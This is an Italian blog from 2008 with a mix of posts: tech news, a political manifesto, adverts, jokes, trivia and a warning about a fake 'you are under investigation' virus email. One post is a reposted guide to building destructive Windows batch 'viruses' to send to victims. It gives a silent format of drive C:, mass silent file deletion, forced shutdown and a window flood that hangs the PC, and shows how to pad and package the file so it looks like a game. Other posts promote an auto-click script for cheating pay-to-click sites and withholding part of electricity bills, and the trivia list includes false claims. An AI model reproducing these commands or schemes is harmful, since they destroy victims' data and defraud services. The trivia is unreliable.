domenica 7 settembre 2008

venerdì 4 aprile 2008

Il Cellulare Che ti Segnala L'Autovelox


E' in arrivo negli Stati Uniti un nuovo sistema per evitare contravvenzioni per eccesso di velocità: il cellulare che avverte l'automobilista della presenza di un autovelox, permettendogli così di rallentare in anticipo. La novità si chiama 'Trapster' ed è stata brevettata da un inventore californiano che utilizza un database apposito. Funziona in questi termini: un automobilista in viaggio si accorge della presenza di un autovelox e manda al sistema apposita segnalazione. Il sistema automaticamente memorizza che all'altezza 'X' della strada 'X' c'é un autovelox in funzione, e manda un segnale di allarme a tutti gli altri automobilisti abbonati che stanno percorrendo lo stesso tratto di strada. 'Trapster' può essere usato dagli utenti con dieci differenti piattaforme wireless e può conservare le informazioni sugli autovelox attivi per circa un'ora. "Di più non serve - ha spiegato l'inventore - perché tanto la polizia li sposta".

venerdì 29 febbraio 2008


Il Nostro movimento politico nasce il 25 Dicembre 2007, dall'esigenza che milioni di cittadini italiani hanno, nel vedere un' Italia Futura sana, in crescita, tecnologicamente avanzata ed assolutamente in grado di ospitare il futuro dei nostri figli. Risanamento economico delle famiglie e delle aziende, innovazione tecnologica e difesa dell'ambiente, sono alla base del comune sentimento di sfida e traguardo, che lanciamo oggi, tutti insieme per il futuro, ma soprattutto per il Presente ! Il nostro Paese non è depresso, noi Italiani non siamo in declino, il NY Times sbaglia quando prevede un'Italia Futura povera e depressa. Ma per dimostrare questo, dobbiamo AGIRE immediatamente, dobbiamo essere protagonisti da SUBITO della Rinascita del nostro Paese, per dimostrare all'Europa, al Mondo ma soprattutto ai nostri figli, che ciò che abbiamo costruito oggi, è qualcosa di assolutamente innovativo ed utile per il loro futuro. Per far questo abbiamo bisogno della partecipazione di TUTTI voi, nelle vostre città, nelle vostre regioni, nel Parlamento, perchè noi non gridiamo al vento che "PRODI vada a casa" o "Berlusconi vada a casa", bensi urliamo UNITI, affinchè TUTTI gli attuali parlamentari VADANO a casa.

Se non ti senti più rappresentato da questi parlamentari perchè non arrivi a fine mese con il tuo stipendio, grazie a loro...

Se non ti senti più rappresentato da questi parlamentari perchè la città in cui vivi è un'immensa discarica abusiva...

Se non ti senti più rappresentato da questi parlamentari perchè la sera, quando esci, ti vergogni del degrado delle vie della tua città, colpite da prostituzione, droga...

Se non ti senti più rappresentato da questi parlamentari perchè la tua azienda non è competitiva, non cresce, non vende, non acquista...è grazie a loro...

Se non ti senti più rappresentato da questi parlamentari perchè i tuoi figli tornando da scuola ne sanno meno di quanto ne sapevano al mattino...

Se non ti senti più rappresentato da questi parlamentari perchè sei del sud...e non ti muovi...

Se non ti senti più rappresentato da questi parlamentari perchè sei del nord...e non ti muovi...

Se non ti senti più rappresentato da questi parlamentari perchè quando senti parlare dei paesi esteri...

ti senti lontano mille miglia dai francesi, inglesi, tedeschi, americani...cinesi....

Se non ti senti più rappresentato da questi parlamentari perchè la tua vita non appartiene più a te ma allo Stato....

Se non ti senti più rappresentato da questi parlamentari perchè sei una casalinga e quando esci per fare la spesa...hai sempre paura di non rientrare più...

Se non ti senti più rappresentato da questi parlamentari perchè sei un pensionato e loro dicono di averti aumentato la pensione...



Se VUOI agire in prima persona, per poter dire ai tuoi figli, di aver contribuito a ridonare all'Italia il suo antico pregio...

Allora entra a far parte di NOI ITALIANI...o meglio : siamo NOI che vogliamo entrare nella tua vita ed insieme, entrare con te in Parlamento, per ESSERCI, per FARE...


Vivete a Bologna oppure passate da qui e non sapete come passare il sabato sera???

Pronta per voi la soluzione:

Nuova Discoteca "IL CLUB" in via stalingrado dietro la zona fieristica tanta gente giovane, musica favolosa e tutta l accoglienza che solo noi bolognesi possiamo offrire.

per info liste e tavoli lasciate un commento e mandatemi una mail.

giovedì 28 febbraio 2008


MondoGlitter.it

Lo sapevate che........?

-E' impossibile leccarvi il gomito

-Un coccodrillo non può tirare fuori la lingua

-Il cuore di un gamberetto è nella testa

-In uno studio effettuato su circa 200.000 struzzi, durato più di 80 anni, non si è mai visto uno struzzo mettere la testa nella sabbia.

-I porci non possono fisicamente guardare il cielo

-Più del 50% delle persone, in tutto il mondo, non hanno mai fatto o ricevuto telefonate.

-I ratti e i cavalli non possono vomitare

-Se starnutite troppo forte, potreste rompervi una costola

-Se tentate di trattenere uno starnuto, potrete causarvi la rottura di una vena nel cervello o nella nuca, e potreste morire

-Se, contro natura, tenete gli occhi aperti mentre startunite, potrebbero uscirvi dalle orbite.

-I ratti si moltiplicano così rapidamente che, in soli 18 mesi, una coppia può avere più di 1 milione di discendenti

-L' accendino è stato inventato prima dei fiammiferi

-Il 35% delle persone che usano annunci personali nei giornali, per trovare un compagno o compagna, sono sposati.

-Nel mondo, il 23% dei problemi alle macchine fotocopiatrici sono causate da persone che si siedono sull'apparecchio per fotocopiarsi il sedere.

-Nella durata media di una vita, una persona che dorme ingoierà 10 ragni e 70 insetti.

-La maggior parte dei rossetti contiene delle lische di pesce

-Come le impronte digitali, l'impronta della lingua è diversa per ogni uomo.

-Il 75% delle persone che leggono quest'e-mail hanno provato a leccare il proprio gomito !

E tu di certo avrai provveduto a mantenere alta questa percentuale...

(Fonte: http://www.mednat.org/)

Uniti per il 2TheBeat


"Per mancanzi di fondi" la nota competizione di freestyle (conosciuta anche come battaglia a colpi di rime improvvisate) che ha fatto emergere artisti come Ensi e Mondomarcio, Kiave ma anche Fabri Fibra ai tempi, Turi, Kiffa,July B non si terrà.


questa notizia è un duro colpo per gli amanti del genere e soprattutto perchè la manifastizione stava emergendo e si iniziava ad essere molto popolare nella nostra penisola.


Questo post è a favore dell'associazione Zona Dopa a sostegno del 2thebeat, per dare il vostro contributo firmate questa petizione per non far scomparire uno spettacolo così. The Show Must Go On.


link per la petizione:






peace

Canone anche per pc e cellulari....

Della serie: "Ormai devo pagare anche l'aria che respiro" arriva questa nuova trovata; è probabile che tra poco tempo non solo i possessori di TV debbano pagare il canone ma anche coloro che tramite cellurari,i-pod,lettori dvx...etc possano ricevere le immagini televisive.

A riferirlo non è,come tutti si aspetano, la RAI ma un vecchio Regio decreto legge del lontano 1938 tale tassa è dovuta per il possesso di "apparecchi atti o adattabili alla ricezione delle radioaudizioni".


In poche parole, qualsiasi apparecchio che teoricamente potrebbe essere modificato per guardare un programma televisivo ne è soggetto. Da qui la richiesta da parte della Rai(Avevate creduto che fosse estranea ai fatti èhhhh??????) di pretendere la tassa non solo per i televisori, ma anche per personal computer, decoder e altri apparecchi multimediale.


Phising e Spam partono dall'italia


L'IBM X-Force Security Report ha rivelato che la crescita della sofisticazione degli attacchi da parte di criminali informatici nei confronti dei Web Browser è cresciuta a livello mondiale. Secondo quanto emerge dallo studio condotto da IBM, i cyber-criminali sono in grado di "rubare" le identità dei consumatori ad un livello mai raggiunto prima attraverso Internet. Il dato impressionante è che l'Italia è ai primi posti per quanto riguarda le mail di phishing e di spam inviate verso i web browser.
Il 14,3% delle mail di phishing mondiali parte proprio dal Bel Paese. In questa speciale "classifica", l'Italia è al secondo posto, dietro alla Spagna (14,8%), ma ben davanti a paesi come la Francia (6.5%), gli Usa (5%) e la Germania (4,4%). Un dato allarmante, che non ci fa assolutamente onore. Ovviamente il dato si riferisce all'ubicazione del server da cui partono le e-mail di phishing: non necessariamente chi compie l'attacco si trova nella stessa nazione da cui parte l'attacco.
L'Italia è citata anche per quanto riguarda l'origine dello spam. In questo caso però, dove "primeggiano" gli Stati Uniti con il 15%, solo il 3,9% delle mail di spam partono dalla nostra penisola.
Ci sono poi altre tre categorie di contenuti web denominati bad, ovvero cattivi: Social Deviance, Criminal Content e Adult. I Social Deviance sono mail a sfondo razziale, estremismi politici. Il 2,1% dei contenuti caratterizzati da Social Deviance si trova in Italia. Per quanto riguarda i Criminal content, sono italiani il 4,6% dei contenuti e il nostro paese risulta sesto nella classifica mondiale stilata dal Report di IBM. L'Italia non rientra quando si parla di contenuti Adult.

Lo studio condotto da IBM ha sottolineato come raffinate tecniche di "camuffamento" per sfuggire ai sistemi di sicurezza siano state messe a punto da i cyber criminali. Nel 2006, solo una piccola percentuale degli attentatori ha impiegato tecniche di camuffamento, ma questo numero è aumentato dell'80% durante la prima metà del 2007 e ha raggiunto circa il 100% entro la fine dello stesso anno. La X-Force ritiene che il fattore criminale contribuirà alla proliferazione degli attacchi nel 2008.
Usando queste tecniche, i criminali informatici possono infiltrarsi nei sistemi degli utenti e rubare le loro identità e password o ottenere informazioni personali, come i riferimenti dei documenti di identità o sanitari, e informazioni relative alle carte di credito o addirittura le coordinate bancarie. Quando gli attentatori invadono invece un computer o un server in un’azienda possono rubare informazioni e dati sensibili o usare la macchina compromessa per accedere ad altri asset aziendali superando i firewall.
“Mai come oggi attacchi così aggressivi rivolti ad infettare, propagare i virus e evadere i sistemi di sicurezza sono stati sostenuti da invasori della rete. Mentre i professionisti che si occupano di sicurezza dei computer possono rivendicare qualche vittoria, gli invasori stanno adattando le loro strategie di approccio e continuano a colpire gli utenti” dichiara Kris Lamb, della X-Force Security Report di IBM.

Una nuova Mail-virus attenzione

"Sei indagato". Leggerlo nell'oggetto di una mail ricevuta nella propria casella di posta elettronica fa un certo effetto. Indagato?
Non proprio, semmai in procinto di essere beffato. Il testo della mail, che in questi giorni sta invadendo le caselle di posta eletttonica in tutta Italia, suggerisce: “Cerca di nascondere subito tutto, e fai veloce!!! il tuo nome è comparso questa mattina sul sito del CAFF di Roma. Controlla tu stesso sei nella lista di gennaio”. Ovviamente viene indicato un indirizzo Internet cui collegarsi per una personale verifica. Nel post scriptum si legge “in ogni caso io non esisto, mi raccomando, non fare mail il mio nome!!!”.

La comunicazione è falsa e lo sconosciuto Mauro Biffi (questo il nome di fantasia scelto dai mascalzoni di turno) è in realtà un untore cibernetico.

Chi segue le istruzioni della mail e fa clic sul link consigliato, finisce sul sito “mail-certicata.com” e il computer viene subito infettato dal virus “NewHeur_PE”. Il GAT Nucleo Speciale Frodi Telematiche ha già avviato una serie di accertamenti tecnico-investigativi che hanno permesso di scoprire che il sito web contaminato è installato su un server operante a Chicago e di proprietà del provider “FDC Servers.net”.

La pagina che viene visualizzata sullo schermo di chi si collega al sito in questione è stata realizzata clonando il logo con la bandiera tricolore utilizzato nelle comunicazioni ufficiali della Presidenza del Consiglio dei Ministri. La dicitura Comando Antifrode CAFF (che potrebbe erroneamente far pensare al Comando Nucleo Frodi Telematiche) e la sigla CAFF GM (ingannevoli perché potenzialmente confondibili con i Centri di Assistenza Fiscale o addirittura con l’acronimo GAT GdF che identifica il reparto delle fiamme gialle specializzato nel contrasto alle frodi online) sono estranee a qualsivoglia realtà della Pubblica Amministrazione e ad organismi delle Forze di Polizia.

La “Pubblicazione indagati Gennaio 2008” e la corrispondente “lista in chiaro” offerte sul sito “mail-certificata.com” non esistono e il tentativo di scaricarle sul proprio computer innesca l’attivazione di un virus informatico dagli effetti non ancora completamente individuati.

Calciostreet il più bel manageriale di calcio al mondo

Entra nel mondo di CalcioStreet


Sei stanco dei soliti browser game di calcio dove la tua squadra è formata da giocatori virtuali?

Vorresti essere parte di una squadra composta da 11 giocatori reali?

E perchè no, potresti anche gestire una società...alle prese con la squadra, i trasferimenti e gli allenamenti.

Se sogni tutto questo non ti resta che iscriverti e provare.

Entra nel mondo di CalcioStreet

è unico nel suo genere perchè nelle sfide di campionato ogni giocatore che scenderà in campo apparterrà a un utente reale!Potrete oppure aspirare a diventare il più ricco manager e portare la vostra squadra ai massimi livelli!Allora che aspettate?

Provate e non ve ne pentirete.Perchè è unico nel suo genere?

Perchè Oltre alle sfide 1 contro 1 chiamate street perchè senza regole ci saranno le sfide di campionato.Ma i giocatori della squadre non sarranno giocatori virtuali creati da voi.Ma ognuno di voi ricoprirà un ruolo ben preciso nella squadra! E così si avrà un squadra composta da 11 calciatori appartenenti a 11 giocatori reali!

DIECI COSE CHE NON HO MAI CAPITO... e continuerò a non capire


1) Come mai le donne non riescono a mettere il mascara tenendo la bocca chiusa?


2) Come mai per chiudere Windows si debba cliccare su 'start'?


3) Come mai la Lemonsoda è fatta con aromi artificiali e nel detersivo per i piatti trovi vero succo di limone?


4) Quando producono un nuovo cibo per cani 'più gustoso', in realtà chi lo ha assaggiato?


5) Perché Noè non ha lasciato affogare quelle due zanzare?


6) Perché sterilizzano l'ago prima di praticare le iniezioni letali?


7) Conoscete le indistruttibili scatole nere deglia aerei? Perché cavolo non ci fanno tutto l'aereo con quella roba???


8) Perché le pecore non si restringono quando piove?


9) Se volare è così sicuro, come mai quello dell'aeroporto lo chiamano Terminal?


10) Non capisco perchè inoltro queste cose!!!...


E ANCORA.... -Le mestruazioni sono la giusta punizione che Dio dette alla donna.Dopo che Eva mangiò la mela Dio disse: 'Pagherai col sangue, ma in comode rate mensili.'


-Ho fatto l'amore con Control. Domani provo con AltCanc.


-Le categorie più bugiarde sono le donne e i cacciatori.I cacciatori prendono un uccello e dicono di averne presi venti, le donne ne prendono venti e dicono di averne preso solo uno...


-Il bambino alla mamma: 'Mamma perché la maestra chiama Roberto Robertino, Paolo Paolino, Luca Luchino e a me no?'La mamma tentennante: 'Lo capirai da grande... Pompeo!'


-Tim informa che acquistando i preservativi delle ferrovie dello Stato potrai venire anche tu con 50minuti di ritardo.


-Qual è il nome più bello per una ragazza? Ikea: è svedese, costa poco, te la porti subito a casae te la monti in 5 minuti!!


-Il sesso è come la matematica. Aggiungi il letto,sottrai i vestiti, dividi le gambe e prega di non moltiplicare!


-Sai chi è l'uomo più furbo al mondo? Quello che ha inventato la supposta? E sai perché? Perché l'ha messa nel CULO A TUTTI!!!!


ENEL...???Che spendaccioni

L'incentivazione alle fonti di energia rinnovabili è stata introdotta dalla legge n. 9 del 1991 e dalla successiva delibera n. 6 emessa dal Cip nel 1992 che ha aggiunto le parole "ed assimilate". Tali normative hanno previsto che i finanziamenti, in parte, gravino (indirettamente) sul singolo utente finale, quale parte del sovrapprezzo del costo della energia. Non esiste, peraltro, una specifica norma che stabilisca un obbligo per il singolo di provvedere al pagamento di una data somma a titolo di finanziamento delle fonti di energia: la normativa in materia, infatti, come sopra accennato, stabilisce che il costo della energia per il pubblico applicato dall'Enel sia costituito da un sovrapprezzo in parte destinato a tale scopo. La "quota" CIP6 viene corrisposta dal singolo utente all'Enel che, a sua volta, la versa allo Stato. Dal momento che questa quota è "annegata" nel prezzo del chilowatt e non esiste una norma che specificamente impone all'utente di pagare quella somma a quel titolo, l'eventuale mancato pagamento da parte del singolo di questa parte dell'intero corrispettivo della fornitura costituisce un inadempimento contrattuale.
Il Cip6 è un tassa sui tumori. Serve a costruire inceneritori che ti termovalorizzano le cellule.Non la vogliono capire con le buone di smettere e di passare alla raccolta differenziata e a forme di smaltimento non nocive per la salute.L'uso criminoso dei NOSTRI soldi per avvelenare le NOSTRE FAMIGLIE deve finire.Vogliamo energie rinnovabili, non respirare diossina e nano particelle.Non pagate più la tassa CIP6 all'ENEL. Io ho già iniziato.L'ENEL ha tolto dalla bolletta la voce A3 con il contributo per gli inceneritori.Calcolare l'importo esatto è quasi impossibile, vale circa il 7%.L'ENEL deve reintrodurre la voce A3 per consentirci di dedurlo correttamente.Nel frattempo:- notificate l'autoriduzione all'ENEL nella form all'indirizzo: Enel/Informazioni con la causale: Detrazione CIP6 per gli inceneritori- togliete il 7% forfettario dall'importo senza IVA esposto in bolletta.

JANUS, IL SUPER "SUPERCOMPUTER"

SI CHIAMA JANUS, IL SUPER "SUPERCOMPUTER"

Un supercomputer in grado di fornire una potenza di 8 POps, ovvero 8 milioni di miliardi di operazioni al secondo consumando solo 10 Kw . Si chiama Janus ed è frutto di una collaborazione italo-spagnola, che in due anni ha coinvolto le Università di Ferrara e di Roma La Sapienza, l'istituto Bifi e l'Università di Saragozza, l'istituto Iia di Argon, l'Università di Madrid e quella dell'Estremadura. Janus, che è il computer più potente al mondo nel suo settore oltre che il più piccolo e a minor consumo, è stato presentato oggi a Trento all'European Centre for Theoretical Studies in Nuclear Physics and Related Areas (Ect) dai ricercatori italiani e spagnoli che lo hanno creato. Janus è stato infatti costruito a Trento da Eurotech nel suo centro di ricerca Ethlab. Eurotech è una società con sede in Friuli attiva nella ricerca e produzione di computer miniaturizzati e ad elevata capacità di calcolo. Per svolgere le operazioni che Janus elabora in un solo secondo, tre miliardi di persone impiegherebbero 60 giorni. Janus è anche il primo calcolatore al mondo a racchiudere tanti elementi in un ingombro così ridotto: un armadio di 1 metro per 1 metro, alto 2. Capace di studiare oggetti sempre più piccoli, 'vede' e riesce a simulare strutture che altrimenti la scienza moderna non potrebbe nemmeno guardare. Come ha spiegato oggi Giorgio Parisi, recente vincitore del Premio Microsoft per la Scienza in Europa, Janus dovrebbe accelerare gli studi nel campo della ricerca e della simulazione di applicazioni scientifiche nel campo delle Nanotecnologie e delle Life Sciences, in particolare negli studi sugli effetti dei medicinali di nuova generazione sulle cellule.

mercoledì 27 febbraio 2008

creare qualche virus

Visto ke internet girava questa guida,dal vekkio service ho preso questa guida NN FATTA DA ME;spiega come fare piccoli virus,anke davvero infami,con il blocco note di windows:Allora ecco una semplice guida x creare dei virus allorasalvare i file-aprire documento di testo-scrivere il codice(i codici li postero alla fine)-andate su salva come e mettete estensione -tutti i file--nominate il file come volete basta che poi scriviate l'estensione esempio: virus.batA questo punto l'icona del programma che avete creato dovrebbe essere uno schermocon una rotella in mezzo... :-

DFORMATTARE -adesso passiamo alla pratica: aprite il blocco note (documento di testo) e incolliamo questa linguettaformat C: /autotest /q /uEcco qua, questo virus formatta l'unità C...in questo modo il computer si formatterà senza chiedere all'utentedi inserire un nuovo disco ne se si vuole confermare laformattazione, e non si potrà neanche bloccare in un secondo momento ^^A questo punto salvate in .bat


CANCELLARE I FILE-ok ora passiamo ad un comando distruttivo la cancellazione dei file@ERASE /S /Q "C:\xxx\xxx\*.*"@DEL /S /Q "C:\xxx\xxx\*.*"i due comandi svolgono lo STESSO identico compito.Ma analizziamo un po' meglio il codice...la "@" non visualizza il percorso del file, ossia non dice in quale cartella è presente quest'ultimoERASE e DEL sono i comandi che cancellano i file, mentre quelliseguiti da "/" sono gli attributi dei comandi... Ecco un'elenco degli attributidi questi due comandi/P Chiede conferma prima di eliminare ogni file./F Forza l'eliminazione dei file di sola lettura./S Elimina i file specificati da tutte le sottodirectory./Q Modalità silenziosa, non chiede conferma per eliminazioni globali./A Seleziona i file da eliminare in base agli attributi.Adesso passiamo all'ultima parte del codice ossia "C:\xxx\xxx\*.*" è intuibileche io stia parlando del percorso di una cartella, ma cos'è quell' *.*alla fine del codice? *.* vuol dire tutti quanti i file, ossia"tutti i file.di tutti i formati", se volessi cancellare solo i file in dll scriverei"*.dll" e se volessi cancellare tutti i file che hanno un determinato nome mahanno un'estenzione diversa scriverei "nomefile.*"Bene, adesso un'ultimo appunto prima di concludere questo capitolo, se dobbiamo cancellareun singolo file possiamo semplicemente usare il comando senza attributi, se si tratta di un singolo fileil programma non chiederà neanche la conferma se cancellarlo o meno...


SHOUTDOWN--il comando shoutdown a un risultato innocuo spegne il computer della vittima senza provocare danni al computer( che poi si riaccenderà )shutdown -f -t 1000 -rEcco fatto, credo che vi basti guardare la lista dei comandi qui sotto per capire che cosafarebbe questo programma, in ogni caso vi spiegherò il comando -t xx che può apparire più complesso...Questo comando permette di spegnere (riavviare come in questo caso o effettuare il logoff) il computerdopo un tot di tempo in secondi a scelta dall'utente :-D-i : attiva l’interfaccia utente grafica-l : effettua il logoff dell’utente.-r : riavvia il sistema-s : chiude la sessione di Windows (spegne il computer)-t : xx indica i secondi di attesa prima della chiusura di Windows-f : chiude le applicazioni ancora aperte


IMPALLARE IL PC-in questo passo spiegherò come impallare il PC della vittima :scrivete tantissime volte la parola startSTARTSTARTSTART.........cosa fa questo programma? apre per ogni start una finestra prompt,in questo modo a una certa il computer della vittima si impallerà e toccherà staccare la spina^_^


APPESANTIRE I VIRUS-allora ogni volta che inviate un qualsiasi virus con nome ad esempio pro6 qualunque vittima brava con il computer capirà che un gioco cosi non può pesare 1 o 2 KB questa striscia che ora postero servirà proprio ad appesantire il file eccola@REM xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxmi raccomando non lasciate solo queste crocette ma mettetecene molte altre cosi che il virus sarà più pesante (più "x" ci saranno più peserà il virus).questo è un mio edit:se volete trasformare il vostro .bat in un .exe nn fidatevi dei servizi online,ma usate iexpress (start,esegui,iexpress) è in inglese ma è facilmente intuibile come si usa e vi consentirà di "inpacchettare" i vostri virus a dovere!!!


non mi assumo alcuna responsabilità riguardo l uso dei virus appena citati questa è solo una guida informativa....perciò ragazzi cautela non è un giochino

bux.to e buxit per raccimolare qualcosina

descrizione del sito
Guadagnare con Bux.to onlineProgramma per guadagnare cliccando su una lista di link e visitando il sito per 30 secondi. Poco impegnativo in termini di tempo e soprattutto può essere fatto quando si vuole. . La valuta è in dollari e si viene pagati 0.01 $ per ogni sito visitato. Vi è anche un referral program a completare l'offerta in base al quale guadagnerai per ogni persona riferita al tuo account. Un esempio di guadagno potrebbe essere con 10 click ads per giorno = $0.10 con 20 referrals che cliccano 10 ads per giorno = $2.00 guadagno giornaliero = $2.10 guadagno settimanale = $14.70 guadagno mensile = $63.00, questo è solo un esempio le cui entità possono variare in base al numero di referral e dei click
il trucco perfettamente legale
1) Innanzitutto dovete avere Mozilla Firefox, per chi non lo sapesse è un browser come Internet Explorer. Per scaricare Firefox andate quihttp://www.mozilla-europe.org/it/products/firefox/
(di seguito capirete perchè serve Firefox e non internet explorer ;)2) Registrarvi a Paypal sempre se già non avete un account quindi andate su
http://www.paypal.it/ ed iscrivetevi creando un account premier (gratis); vi verrà poi richiesto se volete assiociare una carta di credito anche ricaricabile come ad esempio postepay ma non è necessario associarne una ;)
3) Adesso bisogna andare con firefox (mi raccomando da ora tutti i link che vi darò dovrete aprirli con firefox) su http://bux.to/?r=levant88
per registrarvi; ora renderemo automatico il procedimento di click sui link degli sponsor cioè basterà lasciare aperta la pagina di Firefox e ridotta a icona senza calcolarla, farà lei i click al posto nostro ed ora vi dirò come fare.
Ora sempre con firefox aprite questi due link, sono 2 plugin per firefox (quindi se siete in internet explorer copiate prima uno e poi l'altro in firefox) http://addons.mozilla.org/en-US/firefox/addon/748http://addons.mozilla.or g/en-US/firefox/addon/115dopo aver installato questi 2 plugin riavviamo firefox come richiesto.4) Installazione dello script che cliccherà al posto nostro, il link da aprire sempre con firefoxhttp://userscripts.org/scripts/show/22209salvate il file sul disco e poi apritelo con firefox
5) Andate su http://bux.to/index.php e loggatevi premendo su login, dopo di che cliccate nel menu su Surf Ads o andate su cliccate col tasto destro in uno spazio bianco della pagina ed andate su aggiorna ogni (reload every),imposta (custom) e dovrebbe essere prestabilito un tempo di 1 minuto e 30 secondi, se non lo è inserite voi il tempo che vi ho appena citato e cliccate ok, poi di nuovo tasto destro, aggiorna ogni: abilita; dunque ora basterà lasciare la pagina apertapossibilmente tutto il tempo che voi lasciate il pc connesso ad internet ed ogni volta che aprite nuovamente la pagina dovete andare col destro su abilita come vi ho spiegato poco fa in modo da far aggiornare automaticamente la pagina e lo script farà il resto;
ATTENZIONE(Aggiornamento)
Da Gennaio 2008 Bux.to ha deciso di cambiare metodo di pagamento passando a AlterPay. le commissioni di questa banca online sono più alte di quelle di Paypal ed è molto più difficile spedere il denaro guadagnato perchè, per esempio, ebay non lo accetta.Ho pertanto selezionato per voi un altro sito molto interessante. Per iscrivervi potete andare suL seguente indirizzo:
http://buxit.info/register.php?r=levant88 nell'i ndirizzo della registrazione è presente il mio nick così che possiate inserirmi come vostro segnalatore. Come già detto, ciò non toglie nulla ai vostri guadagni.
VANTAGGI: questo sito che vi ho segnalato funziona con la stessa logica di bux.to ma presenta il seguente vantaggio1) utilizza paypal come sistema di pagamento.2) ha una soglia di pagamento più bassa e pari a 5 dollari3) è possibile applicare ad esso lo stesso trucchetto che vi ho spiegato precedentemente senza alcuna variazione. (lo script è atto a funzionare anche con questi sito)
Detto ciò non mi resta che salutarvi e augurarvi ottimi guadagni.

Eurobarre guadagnare navigando

Ciao ragazzi oggi vi voglio parlare del programma francese eurbarre a cui potete accedere e registrarvi direttamente da qui: http://www.eurobarre.com/index.php?p=760033460301

ora vi spiego come funziona:

LA GUIDAInformazioni generali:01- Cos' è Eurobarre?- Eurobarre è un programma d' affiliazione che si sviluppa grazie ad Internet; è un servizio totalmente gratuito ed è destinato agli utenti che dispongono di una connessione Internet, preferibilmente a basso costo o ADSL. Eurobarre è un piccolo programma "pay-to-surfpay-to-readpay-to-answer" (="ti paga in base a quanto tempo sei connessopaga in base al numero di mail pubblicitarie che leggipaga in base ai questionari cui partecipi" ). Una barra pubblicitaria di 72 pixels occupa una piccola parte del monitor ( la parte superiore, v. immagine su ) sulla quale scorrono dei banners pubblicitari quando siamo connessi ad Internet con la nostra normalissima connessione. - La società francese PAGA gli utenti Europei che sfruttano questo programma in base al numero di banners che vengono fatti passare sullo schermo e ai bonus accumulati ( di vario tipo, ne parleremo in seguito ).- Il programma è sicuro: NON contiene Dialer, Spyware, virus, ecc.- NON altera le prestazioni del PC e NON ne modifica i contenuti.
02- Come si guadagna e chi finanza il progetto?- La visualizzazione di ogni banners fa guadagnare 1 punto ( non è necessario clickarci sopra, è sufficiente la sola visualizzazione ). Si guadagnano punti anche con i bonus che si accumulano col passare del tempo e rispondendo ( facoltativamente ) a questionari pubblicitari o leggendo mail della stessa specie. Se fate iscrivere un nuovo utente tramite il vostro link personale ( attraverso il "parrainage" cioè un sistema di refereall ), Eurobarre vi accredita il 100% dei punti di "surf e mail" ( cioè ciò che si accumula navigando e leggendo mail ) guadagnati dal vostro amico ( che diventerà vostro affiliato, in gergo "Figlioccio" ); questo sistema fa incrementare i guadagni in fretta e già con un solo iscritto tramite proprio refereall si possono ottenere il doppio dei punti. Non esistono limiti per quanto riguarda i nuovi utenti che desiderate far iscrivere, non vi è limite all' affiliazione e ai guadagni.- Quando il programma viene ridotto a icona non vengono accumulati punti di surf. - Il programma registra il numero di banners che vengono fatti passare sullo schermo e i bonus accumulati nell' arco di un mese. Non è possibile scoprire immediatamente quanto si è guadagnato ma bisogna aspettare la fine del mese per poter scoprire il nuovo tasso di conversione dei punti accumulati in €uro.- Il progetto è finanziato da importanti ditte ( v. eBay®, superEva®, ecc. ). Il programma si autofinanza ( come viene spiegato nella guida ufficiale ) in quanto l' attività dei propri membri ( che fanno scorrere le pubblicità sullo schermo, che clickano sui link e nei banners, ecc. ) fanno incrementare le entrate della società francese facendo riscuotere delle commissioni rilevanti.03- Quanto si può essere pagati?- E' fondamentale mettere in chiaro che non si diventa ricchi. E' possibile ricevere pagamenti frequentemente ( grazie al sistema di affiliazione ) ma solo dopo aver fatto iscrivere un discreto numero di utenti col proprio link. Quanto si può essere pagati dipende da quanto viene usato il programma e da quanti "Figliocci" avrete accumulato ( la cifra minima per richiedere il pagamento è 15€ ), questo sito potrebbe tornarvi utile per il reclutamento di "figliocci", ma ne parleremo dopo anche in questo caso... :-)
Installazione:04- Come installare il programmino.Prima cosa utilizza il seguente link: http://www.eurobarre.com/index.php?p=760033460301 - Clicka sul pulsante in basso a sinistra dove c' è scritto "Clickez Ici pour dèmarrer" e aspetta che parta il download quindi clicka su "apri" ( sono solo pochi KB, qualche istante per il download ).Se il download non dovesse partire clicka dove c' è scritto "Clickez Ici pour lancer votre Eurobarre" dopodichè puoi scegliere la lingua ( English, French, Spanish ).Fatto questo vedrai un numero composto da molte cifre seguito da uno spazio bianco ( lì dovrai inserire un codice personale di 4 cifre a tua scelta, ad es. il PIN del telefonino... ). Quella sarà la tua password, poi inserisci la tua e-mail VALIDA ( ricorda che è tutto gratuito e che anche attraverso la mail guadagnerete punti BONUS ). Non dimenticarti di scegliere il paese di residenza. Quindi fai click su "Validez votre compte" per attivare il tuo Eurobarre ( diventerete miei affiliati e permetterete a questo sito di crescere! ).
05- Percentuali di guadagno tramite l' affiliazione.- Esiste solo un livello di referall ( cioè non si possono guadagnare anche i punti dei "Figli dei figli" ). Tuttavia non esiste limite all' affiliazione, quindi si guadagneranno il 100% dei punti di surf e mail di ogni affiliato fatto iscrivere tramite il proprio link ma, ricordo ancora, non si guadagneranno pure i punti dei "Figli dei figli".- Ho già messo in chiaro nel punto 02- : "Se fate iscrivere un nuovo utente tramite il vostro link personale, Eurobarre vi accredita il 100% dei punti di surf e mail guadagnati dal vostro amico ( che diventerà vostro affiliato, in gergo "Figlioccio" ), ciò permette di raddoppiare i guadagni nel caso peggiore. Non esistono limiti per quanto riguarda i nuovi utenti che volete far iscrivere", quindi divertitevi ad affiliare i vostri amici e guadagnerete notevolmente di più, inoltre leggete il prossimo punto e scoprite quanto può essere "proficuo" questo sito!
06- Nuove frontiere dell' affiliazione e obiettivo di questo sito.- Questa guida deve essere un chiarimento e un punto di riferimento per ogni utilizzatore di Eurobarre in Italia. Lo scopo è quello di aiutare tutti, il sito verrà aggiornato per essere reso ancora più chiaro e comprensibile...
